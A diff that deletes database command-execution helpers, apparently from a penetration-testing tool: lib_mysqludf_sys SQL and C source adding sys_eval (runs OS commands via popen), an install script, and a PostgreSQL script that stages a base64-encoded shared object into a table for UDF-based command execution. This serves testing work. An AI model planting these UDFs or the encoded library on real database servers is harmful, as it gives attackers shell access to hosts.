-        License along with this library; if not, write to the Free Software
-        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
-DROP FUNCTION IF EXISTS sys_get;
-DROP FUNCTION IF EXISTS sys_set;
-DROP FUNCTION IF EXISTS sys_exec;
-DROP FUNCTION IF EXISTS sys_eval;
-DROP FUNCTION IF EXISTS sys_bineval;
-
-CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.dll';
--- a/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.patch
+++ b/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.patch
@@ -1,354 +0,0 @@
-diff -uN lib_mysqludf_sys_0.0.2/install.sh lib_mysqludf_sys/install.sh
--- lib_mysqludf_sys_0.0.2/install.sh	1970-01-01 01:00:00.000000000 +0100
-+++ lib_mysqludf_sys/install.sh	2009-01-21 00:51:52.000000000 +0000
-@@ -0,0 +1,43 @@
-+#!/bin/bash
-+# lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-+# Copyright (C) 2007  Roland Bouman 
-+# Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-+# web: http://www.mysqludf.org/
-+# email: mysqludfs@gmail.com, bernardo.damele@gmail.com
-+# 
-+# This library is free software; you can redistribute it and/or
-+# modify it under the terms of the GNU Lesser General Public
-+# License as published by the Free Software Foundation; either
-+# version 2.1 of the License, or (at your option) any later version.
-+# 
-+# This library is distributed in the hope that it will be useful,
-+# but WITHOUT ANY WARRANTY; without even the implied warranty of
-+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-+# Lesser General Public License for more details.
-+# 
-+# You should have received a copy of the GNU Lesser General Public
-+# License along with this library; if not, write to the Free Software
-+# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-+
-+echo "Compiling the MySQL UDF"
-+make
-+
-+if test $? -ne 0; then
-+	echo "ERROR: You need libmysqlclient development software installed "
-+	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-+	echo "apt-get install libmysqlclient15-dev"
-+	exit 1
-+else
-+	echo "MySQL UDF compiled successfully"
-+fi
-+
-+echo -e "\nPlease provide your MySQL root password"
-+
-+mysql -u root -p mysql < lib_mysqludf_sys.sql
-+
-+if test $? -ne 0; then
-+	echo "ERROR: unable to install the UDF"
-+	exit 1
-+else
-+	echo "MySQL UDF installed successfully"
-+fi
-Binary files lib_mysqludf_sys_0.0.2/lib_mysqludf_sys_0.0.2.tar.gz and lib_mysqludf_sys/lib_mysqludf_sys_0.0.2.tar.gz differ
-diff -uN lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.c lib_mysqludf_sys/lib_mysqludf_sys.c
--- lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.c	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/lib_mysqludf_sys.c	2009-01-21 00:06:13.000000000 +0000
-@@ -1,8 +1,9 @@
- /* 
- 	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
- 	Copyright (C) 2007  Roland Bouman 
-	web: http://www.xcdsql.org/MySQL/UDF/ 
-	email: mysqludfs@gmail.com
-+	Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-+	web: http://www.mysqludf.org/
-+	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
- 	
- 	This library is free software; you can redistribute it and/or
- 	modify it under the terms of the GNU Lesser General Public
-@@ -51,7 +52,7 @@
- extern "C" {
- #endif
- 
-#define LIBVERSION "lib_mysqludf_sys version 0.0.2"
-+#define LIBVERSION "lib_mysqludf_sys version 0.0.3"
- 
- #ifdef __WIN__
- #define SETENV(name,value)		SetEnvironmentVariable(name,value);
-@@ -139,7 +140,7 @@
- /**
-  * sys_exec
-  * 
- * executes the argument commandstring.
-+ * executes the argument commandstring and returns its exit status.
-  * Beware that this can be a security hazard.
-  */
- DLLEXP 
-@@ -162,6 +163,34 @@
- ,	char *error
- );
- 
-+/**
-+ * sys_eval
-+ * 
-+ * executes the argument commandstring and returns its standard output.
-+ * Beware that this can be a security hazard.
-+ */
-+DLLEXP 
-+my_bool sys_eval_init(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char *message
-+);
-+
-+DLLEXP 
-+void sys_eval_deinit(
-+	UDF_INIT *initid
-+);
-+
-+DLLEXP 
-+char* sys_eval(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char* result
-+,	unsigned long* length
-+,	char *is_null
-+,	char *error
-+);
-+
- 
- #ifdef	__cplusplus
- }
-@@ -336,5 +365,62 @@
- 	return system(args->args[0]);
- }
- 
-+my_bool sys_eval_init(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char *message
-+){
-+	unsigned int i=0;
-+	if(args->arg_count == 1
-+	&& args->arg_type[i]==STRING_RESULT){
-+		return 0;
-+	} else {
-+		strcpy(
-+			message
-+		,	"Expected exactly one string type parameter"
-+		);		
-+		return 1;
-+	}
-+}
-+void sys_eval_deinit(
-+	UDF_INIT *initid
-+){
-+}
-+char* sys_eval(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char* result
-+,	unsigned long* length
-+,	char *is_null
-+,	char *error
-+){
-+	FILE *pipe;
-+	char line[1024];
-+	unsigned long outlen, linelen;
-+
-+	result = malloc(1);
-+	outlen = 0;
-+
-+	pipe = popen(args->args[0], "r");
-+
-+	while (fgets(line, sizeof(line), pipe) != NULL) {
-+		linelen = strlen(line);
-+		result = realloc(result, outlen + linelen);
-+		strncpy(result + outlen, line, linelen);
-+		outlen = outlen + linelen;
-+	}
-+
-+	pclose(pipe);
-+
-+	if (!(*result) || result == NULL) {
-+		*is_null = 1;
-+	} else {
-+		result[outlen] = 0x00;
-+		*length = strlen(result);
-+	}
-+
-+	return result;
-+}
-+
- 
- #endif /* HAVE_DLOPEN */
-diff -uN lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.html lib_mysqludf_sys/lib_mysqludf_sys.html
--- lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.html	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/lib_mysqludf_sys.html	2009-01-22 10:21:46.000000000 +0000
-@@ -23,7 +23,8 @@
- 		This library <code>lib_mysqludf_sys</code> contains a number of functions that allows one to interact with the operating system.		
- 	</p>
- 	<ol>
-		<li><a href="#sys_exec"><code>sys_exec</code></a> - executes an arbitrary command, and can thus be used to launch an external application.</li>
-+		<li><a href="#sys_eval"><code>sys_eval</code></a> - executes an arbitrary command, and returns it's output.</li>
-+		<li><a href="#sys_exec"><code>sys_exec</code></a> - executes an arbitrary command, and returns it's exit code.</li>
- 		<li><a href="#sys_get"><code>sys_get</code></a> - gets the value of an environment variable.</li>
- 		<li><a href="#sys_set"><code>sys_set</code></a> - create an environment variable, or update the value of an existing environment variable.</li>
- 	</ol>
-@@ -31,6 +32,72 @@
- 		Use <a href="#lib_mysqludf_sys_info"><code>lib_mysqludf_sys_info()</code></a> to obtain information about the currently installed version of <code>lib_mysqludf_sys</code>.
- 	</p>
- 	
-+
-+	<a name="sys_eval"></a><h2>sys_eval</h2>
-+	<p>
-+		<code>sys_eval</code> takes one command string argument and executes it, returning its output.
-+	</p>
-+	<h3>Syntax</h3>
-+<pre>sys_eval(<b>arg1</b>)</pre>
-+	<h3>Parameters and Return Values</h3>
-+	<dl>
-+		<dt><code><b>arg1</b></code></dt>
-+		<dd>
-+			A command string valid for the current operating system or execution environment.
-+		</dd>
-+		<dt>returns</dt>
-+		<dd>
-+			Whatever output the command pushed to the standard output stream.
-+		</dd>
-+	</dl>
-+	<h3>Installation</h3>
-+	<p>
-+		Place the shared library binary in an appropriate location. 
-+		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-+		Then, create the function using the following DDL statement:
-+	</p>
-+	<pre>
-+CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-+	</pre>
-+	<p>
-+		The function will be globally available in all databases.
-+	</p>
-+	<p>
-+		The deinstall the function, run the following statement:
-+	</p>
-+	<pre>
-+DROP FUNCTION sys_eval;
-+	</pre>
-+	<h3>Examples</h3>
-+	<p>
-+		None yet
-+	</p>
-+	<h3>A Note of Caution</h3>
-+	<p>
-+		Be very careful in deciding whether you need this function. 
-+		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-+		As the commandstring passed to <code>sys_exec</code> can do pretty much everything, 
-+		exposing the function poses a very real security hazard.
-+	</p>
-+	<p>
-+		Even for a benign user, it is possible to accidentally do a lot of damage with it.
-+		The call will be executed with the privileges of the os user that runs MySQL, 
-+		so it is entirely feasible to delete MySQL's data directory, or worse.		
-+	</p>
-+	<p>	
-+		The function is intended for specialized MySQL applications where one needs extended 
-+		control over the operating system. 
-+		Currently, we do not have UDF's for ftp, email and http, 
-+		and this function can be used to implement such functionality in case it is really necessary
-+		(datawarehouse staging areas could be a case in example).
-+	</p>
-+	<p>
-+		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-+	</p>
-+	<p>
-+                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-+	</p>
-+
- 	<a name="sys_exec"></a><h2>sys_exec</h2>
- 	<p>
- 		<code>sys_exec</code> takes one command string argument and executes it.
-@@ -92,6 +159,9 @@
- 	<p>
- 		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
- 	</p>
-+	<p>
-+                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-+	</p>
- 	<a name="sys_get"></a><h2>sys_get</h2>
- 	<p>
- 		<code>sys_get</code> takes the name of an environment variable and returns the value of the variable.
-Binary files lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.so and lib_mysqludf_sys/lib_mysqludf_sys.so differ
-diff -uN lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.sql lib_mysqludf_sys/lib_mysqludf_sys.sql
--- lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.sql	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/lib_mysqludf_sys.sql	2009-01-22 10:21:53.000000000 +0000
-@@ -1,30 +1,33 @@
-/* 
-	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2007  Roland Bouman 
-	web: http://www.xcdsql.org/MySQL/UDF/ 
-	email: mysqludfs@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-+/*
-+        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-+        Copyright (C) 2007  Roland Bouman
-+        Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-+        web: http://www.mysqludf.org/
-+        email: roland.bouman@gmail.com, bernardo.damele@gmail.com
-+
-+        This library is free software; you can redistribute it and/or
-+        modify it under the terms of the GNU Lesser General Public
-+        License as published by the Free Software Foundation; either
-+        version 2.1 of the License, or (at your option) any later version.
-+
-+        This library is distributed in the hope that it will be useful,
-+        but WITHOUT ANY WARRANTY; without even the implied warranty of
-+        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-+        Lesser General Public License for more details.
-+
-+        You should have received a copy of the GNU Lesser General Public
-+        License along with this library; if not, write to the Free Software
-+        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
- */
- 
-drop function lib_mysqludf_sys_info;
-drop function sys_get;
-drop function sys_set;
-drop function sys_exec;
-+DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
-+DROP FUNCTION IF EXISTS sys_get;
-+DROP FUNCTION IF EXISTS sys_set;
-+DROP FUNCTION IF EXISTS sys_exec;
-+DROP FUNCTION IF EXISTS sys_eval;
- 
-create function lib_mysqludf_sys_info returns string soname 'lib_mysqludf_sys.so';
-create function sys_get returns string soname 'lib_mysqludf_sys.so';
-create function sys_set returns int soname 'lib_mysqludf_sys.so';
-create function sys_exec returns int soname 'lib_mysqludf_sys.so';
-+CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
-diff -uN lib_mysqludf_sys_0.0.2/Makefile lib_mysqludf_sys/Makefile
--- lib_mysqludf_sys_0.0.2/Makefile	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/Makefile	2009-01-19 09:11:00.000000000 +0000
-@@ -1,6 +1,4 @@
-linux: \
- lib_mysqludf_sys.so
-+LIBDIR=/usr/lib
- 
-lib_mysqludf_sys.so: \
- 
-	gcc -Wall -I/opt/mysql/mysql/include -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
-+install:
-+	gcc -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o $(LIBDIR)/lib_mysqludf_sys.so
-Common subdirectories: lib_mysqludf_sys_0.0.2/.svn and lib_mysqludf_sys/.svn
--- a/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz
+++ b/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz
--- a/extra/postgresqludfsys/command_execution/linux.sql
+++ b/extra/postgresqludfsys/command_execution/linux.sql
@@ -1,97 +0,0 @@
-- Notes:
-- 
-- The SO compiled using PostgreSQL 8.3 C libraries differs from the one
-- compiled using PostgreSQL 8.2 C libraries
-- 
-- SO compiled using PostgreSQL 8.3 C libraries
-- lib_postgresqludf_sys.so: 8567 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped)
-- lib_postgresqludf_sys.so: 5476 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped)
-- 
-- SO compiled using PostgreSQL 8.2 C libraries
-- lib_postgresqludf_sys.so: 8567 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped)
-- lib_postgresqludf_sys.so: 5476 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped)
-- 
-- Little hack to compress the shared object:
-- * Compile with -O1 the shared object
-- * Use strip to remove all symbols (-s) and non-global symbols (-x)
-
-
-- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data text);
-
-
-- Insert the base64 encoded UDF in the table
-
-- SO compiled using PostgreSQL 8.3 C libraries
-INSERT INTO udftest(data) VALUES ('f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAYAYAADQAAAB8EQAAAAAAADQAIAAFACgAGQAYAAEAAAAAAAAAAAAAAAAAAAD4CQAA+AkAAAUAAAAAEAAAAQAAAAQPAAAEHwAABB8AAAgBAAAQAQAABgAAAAAQAAACAAAAGA8AABgfAAAYHwAA0AAAANAAAAAGAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAUuV0ZAQPAAAEHwAABB8AAPwAAAD8AAAABAAAAAEAAAARAAAAGgAAAAAAAAANAAAAAAAAAAQAAAAAAAAAAgAAAAcAAAAAAAAAFQAAABcAAAAOAAAADwAAAAwAAAATAAAACAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAwAAAAUAAAAAAAAAEgAAABgAAAAAAAAACQAAABQAAAALAAAAFgAAAAAAAAAAAAAAAAAAABkAAAAAAAAACgAAAAAAAAAQAAAAAAAAABEAAAADAAAAEAAAAAIAAAAGAAAAiACgAQTNRFkQAAAAFgAAABgAAAAuZ1QeqGi+EqpfvhK645J8QkXV7DNeVB7YcVgcuY3xDurT7w7HDabUAAAAAAAAAAAAAAAAAAAAAJAAAAAAAAAAAAAAABIAAADLAAAAAAAAAAAAAAAQAAAAAQAAAAAAAAAAAAAAIAAAACsAAAAAAAAAAAAAACAAAACWAAAAAAAAAAAAAAASAAAAxAAAAAAAAAAAAAAAEgAAAJ4AAAAAAAAAAAAAABIAAACmAAAAAAAAAAAAAAASAAAAzAAAAAAAAAAAAAAAEgAAAIkAAAAAAAAAAAAAABIAAACCAAAAAAAAAAAAAAASAAAAswAAAAAAAAAAAAAAEgAAABwAAAAAAAAAA');
-UPDATE udftest SET data=data||'AAAACIAAACsAAAAAAAAAAAAAAASAAAAcQAAAAAAAAAAAAAAEAAAAE0AAAAmBwAACgAAABIACwBWAAAAAAkAAHwAAAASAAsAaAAAADoHAADGAQAAEgALAO4AAAAUIAAAAAAAABAA8f/bAAAADCAAAAAAAAAQAPH/XwAAADAHAAAKAAAAEgALAOIAAAAMIAAAAAAAABAA8f8QAAAA+AUAAAAAAAASAAkAFgAAALgJAAAAAAAAEgAMAD8AAAAcBwAACgAAABIACwAAX19nbW9uX3N0YXJ0X18AX2luaXQAX2ZpbmkAX19jeGFfZmluYWxpemUAX0p2X1JlZ2lzdGVyQ2xhc3NlcwBQZ19tYWdpY19mdW5jAHBnX2ZpbmZvX3N5c19leGVjAHBnX2ZpbmZvX3N5c19ldmFsAHBnX2RldG9hc3RfZGF0dW0AbWFsbG9jAG1lbWNweQBwb3BlbgByZWFsbG9jAHN0cm5jcHkAZmdldHMAcGNsb3NlAF9fc3RhY2tfY2hrX2ZhaWwAc3lzdGVtAHBmcmVlAGxpYmMuc28uNgBfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZABHTElCQ18yLjEuMwBHTElCQ18yLjQAR0xJQkNfMi4wAEdMSUJDXzIuMQAAAAACAAAAAAAAAAMAAwADAAMAAwADAAMABAAFAAIAAAABAAEAAQABAAEAAQABAAEAAQABAAAAAQAEANEAAAAQAAAAAAAAAHMfaQkAAAUA8wAAABAAAAAUaWkNAAAEAP8AAAAQAAAAEGlpDQAAAwAJAQAAEAAAABFpaQ0AAAIAEwEAAAAAAAAgBwAACAAAACoHAAAIAAAANAcAAAgAAACjBwAACAAAAAggAAAIAAAAWwcAAAIPAAAZCQAAAg8AAHAHAAACCwAAlQ';
-UPDATE udftest SET data=data||'cAAAILAACNCAAAAgsAAC4JAAACCwAAhQcAAAIKAADaCAAAAgoAAEMJAAACCgAAqwcAAAIBAADwBwAAAgUAABgIAAACBwAAPggAAAIIAABUCAAAAg4AAPEIAAACDAAATwkAAAIGAABZCQAAAgkAAGkJAAACAgAA6B8AAAYDAADsHwAABgQAAPAfAAAGDQAAACAAAAcDAAAEIAAABw0AAFWJ5VOD7AToAAAAAFuBw/AZAACLk/T///+F0nQF6B4AAADowQAAAOhcAwAAWFvJw/+zBAAAAP+jCAAAAAAAAAD/owwAAABoAAAAAOng/////6MQAAAAaAgAAADp0P///wAAAAAAAAAAVYnlVlPorQAAAIHDihkAAIPsEIC7GAAAAAB1XYuD/P///4XAdA6LgxQAAACJBCTotP///4uLHAAAAI2DHP///42TGP///ynQwfgCjXD/OfFzII22AAAAAI1BAYmDHAAAAP+Ugxj///+LixwAAAA58XLmxoMYAAAAAYPEEFteXcNVieVT6C4AAACBwwsZAACD7ASLkyD///+F0nQVi5P4////hdJ0C42DIP///4kEJP/Sg8QEW13Dixwkw5BVieW44AkAAF3DVYnluNwJAABdw1WJ5bjYCQAAXcNVieVXVlOB7CwEAABloRQAAACJRfAxwItFCItAEIkEJOj8////iceLAMHoAo1w/IPoA4kEJOj8////icONRwSJdCQIiUQkBIkcJOj8////xgQzAMcEJAEAAADo/P///4mF2Pv//8dEJATUCQAAiRwk6Pz///+Jhdz7///HheD7//8AAAAA62GNvfD7//+4AAAAALn/////8q6JyPfQjXD/i53g+///AfOJXCQEi5XY+///iRQk6Pz///+Jhdj7//+JdCQIjYXw+///iUQ';
-UPDATE udftest SET data=data||'kBIuF2Pv//wOF4Pv//4kEJOj8////iZ3g+///i5Xc+///iVQkCMdEJAQABAAAjYXw+///iQQk6Pz///+FwA+Fd////4uV3Pv//4kUJOj8////i4XY+///gDgAdAuLleD7///GRBD/AL7/////i73Y+///uwAAAACJ8YnY8q730YPBA4kMJOj8////iYXU+///i73Y+///ifGJ2PKu99GNDI0MAAAAi5XU+///iQqLvdj7//+J8fKu99GD6QGJ0IPABIlMJAiLldj7//+JVCQEiQQk6Pz///+LhdT7//+LVfBlMxUUAAAAdAXo/P///4HELAQAAFteX13DVYnlg+wYiV30iXX4iX38i1UIi0IQiQQk6Pz///+Jx4sAwegCjXD8g+gDiQQk6Pz///+Jw41HBIl0JAiJRCQEiRwk6Pz////GBDMAiRwk6Pz///+JxokcJOj8////i0UIO3gQdAiJPCTo/P///4nwi130i3X4i338iexdw5CQkJBVieVWU+iN/f//gcNqFgAAi4MQ////g/j/dBmNsxD///+NtCYAAAAAg+4E/9CLBoP4/3X0W15dw1WJ5VOD7AToAAAAAFuBwzAWAADokPz//1lbycNyAAAAAQAAAAEAAAAUAAAAIwMAAGQAAAAgAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAQAAANEAAAAMAAAA+AUAAA0AAAC4CQAABAAAANQAAAD1/v9viAEAAAUAAAB0AwAABgAAANQBAAAKAAAAHQEAAAsAAAAQAAAAAwAAAPQfAAACAAAAEAAAABQAAAARAAAAFwAAAOgFAAARAAAAGAUAABIAAADQAAAAEwAAAAgAAAAWAAAAAAAAAP7//2/IBAAA////bwEAAADw//9vkgQAAPr//28FAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgfAAAAAAAAAAAAAD4GAABOBgAACCAAAA';
-UPDATE udftest SET data=data||'BHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAEdDQzogKFVidW50dSA0LjMuMi0xdWJ1bnR1MTIpIDQuMy4yAABHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAC5zaHN0cnRhYgAuZ251Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZQAuY3RvcnMALmR0b3JzAC5qY3IALmR5bmFtaWMALmdvdAAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAFAAAAAgAAANQAAADUAAAAtAAAAAMAAAAAAAAABAAAAAQAAAALAAAA9v//bwIAAACIAQAAiAEAAEwAAAADAAAAAAAAAAQAAAAEAAAAFQAAAAsAAAACAAAA1AEAANQBAACgAQAABAAAAAEAAAAEAAAAEAAAAB0AAAADAAAAAgAAAHQDAAB0AwAAHQEAAAAAAAAAAAAAAQAAAAAAAAAlAAAA////bwIAAACSBAAAkgQAADQAAAADAAAAAAAAAAIAAAACAAAAMgAAAP7//28CAAAAyAQAAMgEAABQAAAABAAAAAEAAAAEAAAAAAAAAEEAAAAJAAAAAgAAABgFAAAYBQAA0AAAAAMAAAAAAAAABAAAAAg';
-UPDATE udftest SET data=data||'AAABKAAAACQAAAAIAAADoBQAA6AUAABAAAAADAAAACgAAAAQAAAAIAAAAUwAAAAEAAAAGAAAA+AUAAPgFAAAwAAAAAAAAAAAAAAAEAAAAAAAAAE4AAAABAAAABgAAACgGAAAoBgAAMAAAAAAAAAAAAAAABAAAAAQAAABZAAAAAQAAAAYAAABgBgAAYAYAAFgDAAAAAAAAAAAAABAAAAAAAAAAXwAAAAEAAAAGAAAAuAkAALgJAAAcAAAAAAAAAAAAAAAEAAAAAAAAAGUAAAABAAAAAgAAANQJAADUCQAAIAAAAAAAAAAAAAAABAAAAAAAAABtAAAAAQAAAAIAAAD0CQAA9AkAAAQAAAAAAAAAAAAAAAQAAAAAAAAAdwAAAAEAAAADAAAABB8AAAQPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAH4AAAABAAAAAwAAAAwfAAAMDwAACAAAAAAAAAAAAAAABAAAAAAAAACFAAAAAQAAAAMAAAAUHwAAFA8AAAQAAAAAAAAAAAAAAAQAAAAAAAAAigAAAAYAAAADAAAAGB8AABgPAADQAAAABAAAAAAAAAAEAAAACAAAAJMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACYAAAAAQAAAAMAAAD0HwAA9A8AABQAAAAAAAAAAAAAAAQAAAAEAAAAoQAAAAEAAAADAAAACCAAAAgQAAAEAAAAAAAAAAAAAAAEAAAAAAAAAKcAAAAIAAAAAwAAAAwgAAAMEAAACAAAAAAAAAAAAAAABAAAAAAAAACsAAAAAQAAAAAAAAAAAAAADBAAALkAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAMAAAAAAAAAAAAAAMUQAAC1AAAAAAAAAAAAAAABAAAAAAAAAA==';
-
